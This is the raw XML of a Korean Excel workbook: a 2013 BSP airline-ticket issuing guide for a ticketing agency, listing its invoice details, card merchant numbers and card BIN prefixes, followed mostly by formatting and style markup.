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5480" windowHeight="11580" activeTab="0"/>
  </bookViews>
  <sheets>
    <sheet name="업데이트 2013.07.31" sheetId="1" r:id="rId1"/>
    <sheet name="VXXXXXXX" sheetId="2" state="veryHidden" r:id="rId2"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm.Print_Area" localSheetId="0">'업데이트 2013.07.31'!$A$1:$K$274</definedName>
  </definedNames>
  <calcPr fullCalcOnLoad="1"/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="113" uniqueCount="97">
  <si>
    <t>011</t>
  </si>
  <si>
    <t>021</t>
  </si>
  <si>
    <t>071</t>
  </si>
  <si>
    <t>HP-KRW.xls</t>
  </si>
  <si>
    <t>LGCard_BIN.xls의 워크시트.xls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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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B.S.P 발권 안내</t>
  </si>
  <si>
    <t>(1) 세금계산서 기재 사항</t>
  </si>
  <si>
    <t xml:space="preserve">  상호</t>
  </si>
  <si>
    <t xml:space="preserve">  ㈜탐스에어서비스</t>
  </si>
  <si>
    <t xml:space="preserve">  주소</t>
  </si>
  <si>
    <t xml:space="preserve">  서울 중구 소공동 91-1</t>
  </si>
  <si>
    <t xml:space="preserve">  대표자</t>
  </si>
  <si>
    <t xml:space="preserve">  홍  찬  호</t>
  </si>
  <si>
    <t xml:space="preserve">  업태</t>
  </si>
  <si>
    <t xml:space="preserve">  서비스</t>
  </si>
  <si>
    <t xml:space="preserve">  사업자 등록번호</t>
  </si>
  <si>
    <t xml:space="preserve">  104-81-94191</t>
  </si>
  <si>
    <t xml:space="preserve">  종목</t>
  </si>
  <si>
    <t xml:space="preserve">  매표대리</t>
  </si>
  <si>
    <t xml:space="preserve">  전화 번호</t>
  </si>
  <si>
    <t xml:space="preserve">  팩스 번호</t>
  </si>
  <si>
    <t>(2) 카드별 가맹점 번호</t>
  </si>
  <si>
    <t>카드회사 및</t>
  </si>
  <si>
    <t>사용 카드 번호</t>
  </si>
  <si>
    <t>가맹점 번호</t>
  </si>
  <si>
    <t>(XX는 은행코드)</t>
  </si>
  <si>
    <t xml:space="preserve"> 비씨 카드</t>
  </si>
  <si>
    <t>75-364772-8</t>
  </si>
  <si>
    <t xml:space="preserve"> </t>
  </si>
  <si>
    <t>외환 카드</t>
  </si>
  <si>
    <t>00-937-88079-7</t>
  </si>
  <si>
    <t>현대 카드</t>
  </si>
  <si>
    <t>100-090957</t>
  </si>
  <si>
    <t>9490-26</t>
  </si>
  <si>
    <t>9490-29</t>
  </si>
  <si>
    <t>해외 발행 카드에 한함</t>
  </si>
  <si>
    <t xml:space="preserve"> 38</t>
  </si>
  <si>
    <t xml:space="preserve"> 36</t>
  </si>
  <si>
    <t xml:space="preserve">               "</t>
  </si>
  <si>
    <t xml:space="preserve"> 39</t>
  </si>
  <si>
    <t>삼성 카드</t>
  </si>
  <si>
    <t>114610196</t>
  </si>
  <si>
    <t xml:space="preserve"> 37</t>
  </si>
  <si>
    <t>해외 발행 카드 한함</t>
  </si>
  <si>
    <t xml:space="preserve"> 3411 10에서 3411 19까지</t>
  </si>
  <si>
    <t>921-058-040-3</t>
  </si>
  <si>
    <t>국민 카드</t>
  </si>
  <si>
    <t>40383415</t>
  </si>
  <si>
    <t>010</t>
  </si>
  <si>
    <t>019</t>
  </si>
  <si>
    <t>030</t>
  </si>
  <si>
    <t>090</t>
  </si>
  <si>
    <t>220</t>
  </si>
  <si>
    <t>224</t>
  </si>
  <si>
    <t>229</t>
  </si>
  <si>
    <t>020</t>
  </si>
  <si>
    <t>070</t>
  </si>
  <si>
    <t>091</t>
  </si>
  <si>
    <t>221</t>
  </si>
  <si>
    <t>227</t>
  </si>
  <si>
    <t>013</t>
  </si>
  <si>
    <t>093</t>
  </si>
  <si>
    <t>223</t>
  </si>
  <si>
    <t>228</t>
  </si>
  <si>
    <r>
      <t>해외발행 카드</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="9"/>
        <rFont val="굴림체"/>
        <family val="3"/>
      </rPr>
      <t>(외환)</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">  * 3528-35 로 시작하는 해외  JCB 발행 카드 </t>
  </si>
  <si>
    <t xml:space="preserve">  * 4 로 시작하는 해외 VISA 발행 카드</t>
  </si>
  <si>
    <t xml:space="preserve">    00-937-88079-7</t>
  </si>
  <si>
    <t xml:space="preserve">  * 5 로 시작하는 해외 MASTER 발행 카드</t>
  </si>
  <si>
    <t xml:space="preserve">  비씨 카드</t>
  </si>
  <si>
    <t>4048-22</t>
  </si>
  <si>
    <t>4140-33</t>
  </si>
  <si>
    <t>4211-33</t>
  </si>
  <si>
    <t>4214-23</t>
  </si>
  <si>
    <t>4214-25</t>
  </si>
  <si>
    <t>4553-33</t>
  </si>
  <si>
    <t>4906-33</t>
  </si>
  <si>
    <t xml:space="preserve">사용 중지 카드 </t>
  </si>
  <si>
    <t>43372051</t>
  </si>
  <si>
    <t>AMEX 카드(롯데)</t>
  </si>
  <si>
    <t>신한 카드</t>
  </si>
  <si>
    <t xml:space="preserve">  02) 753-9114</t>
  </si>
  <si>
    <t xml:space="preserve">  02) 753-9040</t>
  </si>
  <si>
    <t>(2013년 07월 31일)</t>
  </si>
  <si>
    <t>사용 카드 번호</t>
  </si>
  <si>
    <t>카드회사 및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</si>
</sst>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&quot;월&quot;\ dd&quot;일&quot;"/>
    <numFmt numFmtId="178" formatCode="#,##0_ "/>
    <numFmt numFmtId="179" formatCode="0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;[Red]\(0.00\)"/>
    <numFmt numFmtId="187" formatCode="\$#,##0.0_);[Red]\(\$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.00"/>
    <numFmt numFmtId="193" formatCode="\$#,##0"/>
    <numFmt numFmtId="194" formatCode="&quot;₩&quot;#,##0"/>
    <numFmt numFmtId="195" formatCode="\$#,##0.00"/>
    <numFmt numFmtId="196" formatCode="m&quot;월&quot;\ d&quot;일&quot;"/>
    <numFmt numFmtId="197" formatCode="mmm&quot;-&quot;yy"/>
    <numFmt numFmtId="198" formatCode="d&quot;-&quot;mmm"/>
    <numFmt numFmtId="199" formatCode="&quot;₩&quot;#,##0.00"/>
    <numFmt numFmtId="200" formatCode="&quot;US$&quot;#,##0.00"/>
    <numFmt numFmtId="201" formatCode="mmm/yyyy"/>
    <numFmt numFmtId="202" formatCode="#,##0.0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\$* #,##0.00_ ;_-\$* \-#,##0.00\ ;_-\$* &quot;-&quot;??_ ;_-@_ "/>
    <numFmt numFmtId="210" formatCode="_-\$* #,##0_ ;_-\$* \-#,##0\ ;_-\$* &quot;-&quot;_ ;_-@_ "/>
    <numFmt numFmtId="211" formatCode="0.00_ "/>
    <numFmt numFmtId="212" formatCode="\-"/>
    <numFmt numFmtId="213" formatCode="\-#,##0"/>
    <numFmt numFmtId="214" formatCode="\-#,###"/>
    <numFmt numFmtId="215" formatCode="yy/mm/dd"/>
    <numFmt numFmtId="216" formatCode="_ * #,##0_ ;_ * \-#,##0_ ;_ * &quot;-&quot;_ ;_ @_ "/>
    <numFmt numFmtId="217" formatCode="_ * #,##0.00_ ;_ * \-#,##0.00_ ;_ * &quot;-&quot;??_ ;_ @_ "/>
    <numFmt numFmtId="218" formatCode="&quot;₩&quot;#,##0;[Red]&quot;₩&quot;&quot;₩&quot;\-#,##0"/>
    <numFmt numFmtId="219" formatCode="&quot;₩&quot;#,##0.00;[Red]&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;\-#,##0.00"/>
    <numFmt numFmtId="220" formatCode="&quot;₩&quot;#,##0;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;\-#,##0"/>
    <numFmt numFmtId="221" formatCode="&quot;₩&quot;#,##0.00;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;\-#,##0.00"/>
    <numFmt numFmtId="222" formatCode="m&quot;/&quot;d"/>
    <numFmt numFmtId="223" formatCode="&quot;US$&quot;#,##0_);\(&quot;US$&quot;#,##0\)"/>
    <numFmt numFmtId="224" formatCode="&quot;US$&quot;#,##0_);[Red]\(&quot;US$&quot;#,##0\)"/>
    <numFmt numFmtId="225" formatCode="_-&quot;US$&quot;* #,##0.00_ ;_-&quot;US$&quot;* \-#,##0.00\ ;_-&quot;US$&quot;* &quot;-&quot;??_ ;_-@_ "/>
    <numFmt numFmtId="226" formatCode="_-&quot;US$&quot;* #,##0_ ;_-&quot;US$&quot;* \-#,##0\ ;_-&quot;US$&quot;* &quot;-&quot;_ ;_-@_ "/>
    <numFmt numFmtId="227" formatCode="#,##0;[Red]#,##0"/>
    <numFmt numFmtId="228" formatCode="0.0%"/>
    <numFmt numFmtId="229" formatCode="&quot;₩&quot;#,##0;[Red]&quot;₩&quot;#,##0"/>
    <numFmt numFmtId="230" formatCode="0_);\(0\)"/>
    <numFmt numFmtId="231" formatCode="0_ ;[Red]\-0\ "/>
    <numFmt numFmtId="232" formatCode="\$#,##0.00;[Red]\-\$#,##0.00"/>
    <numFmt numFmtId="233" formatCode="\$#,##0.0;[Red]\$#,##0.0"/>
    <numFmt numFmtId="234" formatCode="\$#,##0;[Red]\$#,##0"/>
    <numFmt numFmtId="235" formatCode="####\-##"/>
  </numFmts>
  <fonts count="56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u val="single"/>
      <sz val="12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sz val="9"/>
      <name val="돋움"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="2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돋움"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="9"/>
      <color indexed="8"/>
      <name val="돋움체"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="9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/>
      <protection/>
    </xf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218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/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="33" borderId="0" xfId="78" applyFont="1" applyFill="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="0" xfId="78">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="33" borderId="0" xfId="78" applyFill="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="34" borderId="18" xfId="78" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="35" borderId="19" xfId="78" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="36" borderId="20" xfId="78" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="37" borderId="21" xfId="78" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="36" borderId="21" xfId="78" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="36" borderId="22" xfId="78" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="35" borderId="23" xfId="78" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="34" borderId="24" xfId="78" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="35" borderId="24" xfId="78" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="34" borderId="25" xfId="78" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="49" fontId="4" fillId="0" borderId="26" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="235" fontId="9" fillId="0" borderId="0" xfId="77" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="26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 vertical="center"/>
    </xf>
    <xf numFmtId="235" fontId="9" fillId="0" borderId="27" xfId="77" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="235" fontId="9" fillId="0" borderId="15" xfId="77" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="235" fontId="4" fillId="0" borderId="0" xfId="77" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="235" fontId="4" fillId="0" borderId="26" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="235" fontId="9" fillId="0" borderId="16" xfId="77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235" fontId="4" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="235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77" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="centerContinuous" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="15" xfId="77" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="centerContinuous"/>
      <protection/>
    </xf>
    <xf numFmtId="235" fontId="4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35" fontId="9" fillId="0" borderId="26" xfId="77" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="12" xfId="77" applyFont="1" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="11" xfId="77" applyFont="1" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="17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7" fontId="4" fillId="0" borderId="0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/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="47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35" fontId="4" fillId="0" borderId="17" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="235" fontId="4" fillId="0" borderId="27" xfId="77" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="235" fontId="4" fillId="0" borderId="0" xfId="77" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="235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235" fontId="4" fillId="0" borderId="15" xfId="77" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="34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Continuous"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="51" xfId="75" applyNumberFormat="1" applyFont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0" fontId="20" fillId="0" borderId="52" xfId="75" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="38" borderId="51" xfId="75" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="38" borderId="51" xfId="76" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="235" fontId="9" fillId="0" borderId="16" xfId="77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49" fontId="4" fillId="0" borderId="52" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="38" borderId="52" xfId="76" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="235" fontId="9" fillId="0" borderId="0" xfId="77" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="38" borderId="0" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="235" fontId="9" fillId="38" borderId="0" xfId="77" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="26" xfId="77" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="38" borderId="52" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="38" borderId="52" xfId="75" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="38" borderId="53" xfId="76" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="38" borderId="53" xfId="75" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="38" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="235" fontId="4" fillId="0" borderId="54" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="235" fontId="4" fillId="0" borderId="55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/>
    </xf>
    <xf numFmtId="235" fontId="4" fillId="0" borderId="55" xfId="77" applyNumberFormat="1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20" fillId="0" borderId="53" xfId="75" applyNumberFormat="1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" fontId="4" fillId="0" borderId="15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20" fillId="38" borderId="55" xfId="75" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="51" xfId="76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Continuous" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="38" borderId="13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0" fillId="0" borderId="13" xfId="77" applyFont="1" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="51" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="38" borderId="57" xfId="76" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="38" borderId="58" xfId="76" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="38" borderId="58" xfId="75" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="49" fontId="4" fillId="38" borderId="58" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="49" fontId="4" fillId="0" borderId="59" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="5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49" fontId="21" fillId="38" borderId="52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0" fillId="38" borderId="54" xfId="76" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="38" borderId="55" xfId="76" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="55" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="21" fillId="38" borderId="56" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="38" borderId="60" xfId="75" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="38" borderId="61" xfId="75" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="38" borderId="62" xfId="75" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="53" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="38" borderId="52" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="38" borderId="51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0" fillId="0" borderId="60" xfId="75" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="61" xfId="75" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="62" xfId="75" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="54" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="55" xfId="75" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="56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0" fillId="0" borderId="35" xfId="75" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="54" xfId="75" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="56" xfId="75" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="49" fontId="21" fillId="0" borderId="52" xfId="0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49" fontId="4" fillId="0" borderId="64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5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235" fontId="4" fillId="0" borderId="15" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="38" borderId="60" xfId="76" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="38" borderId="61" xfId="76" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="38" borderId="62" xfId="76" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="56" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="235" fontId="9" fillId="0" borderId="66" xfId="77" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="66" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="235" fontId="9" fillId="0" borderId="67" xfId="77" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="23" xfId="75" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="21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0" fillId="0" borderId="63" xfId="75" applyNumberFormat="1" applyFont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68" xfId="75" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="15" xfId="77" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="centerContinuous" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="38" borderId="57" xfId="75" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection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0" fillId="0" borderId="0" xfId="77" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="centerContinuous"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="17" xfId="77" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="27" xfId="77" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="47" xfId="7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Continuous" vertical="center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Normal_ SG&amp;A Bridge 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뷭?_BOOKSHIP" xfId="55"/>
    <cellStyle name="설명 텍스트" xfId="56"/>
    <cellStyle name="셀 확인" xfId="57"/>
    <cellStyle name="Comma" xfId="58"/>
    <cellStyle name="Comma [0]" xfId="59"/>
    <cellStyle name="연결된 셀" xfId="60"/>
    <cellStyle name="Followed Hyperlink" xfId="61"/>
    <cellStyle name="요약" xfId="62"/>
    <cellStyle name="입력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_1202" xfId="71"/>
    <cellStyle name="콤마_1202" xfId="72"/>
    <cellStyle name="Currency" xfId="73"/>
    <cellStyle name="Currency [0]" xfId="74"/>
    <cellStyle name="표준 2" xfId="75"/>
    <cellStyle name="표준 3" xfId="76"/>
    <cellStyle name="표준_HABSP(카드)발권안내ex" xfId="77"/>
    <cellStyle name="표준_kc-elec system check list" xfId="78"/>
    <cellStyle name="Hyperlin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161925</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>4</xdr:col>
      <xdr:colOff>361950</xdr:colOff>
      <xdr:row>4</xdr:row>
      <xdr:rowOff>28575</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="1" name="Picture 1" descr="US Logo 1 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3838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9"/>
  <sheetViews>
    <sheetView tabSelected="1" view="pageBreakPreview" zoomScale="110" zoomScaleSheetLayoutView="110" zoomScalePageLayoutView="0" workbookViewId="0" topLeftCell="A58">
      <selection activeCell="G77" sqref="G77"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.88671875" defaultRowHeight="13.5"/>
  <cols>
    <col min="1" max="1" width="19.99609375" style="42" customWidth="1"/>
    <col min="2" max="8" width="7.88671875" style="42" customWidth="1"/>
    <col min="9" max="9" width="10.21484375" style="42" customWidth="1"/>
    <col min="10" max="10" width="8.99609375" style="43" customWidth="1"/>
    <col min="11" max="16384" width="8.88671875" style="42" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" ht="14.25" thickBot="1"/>
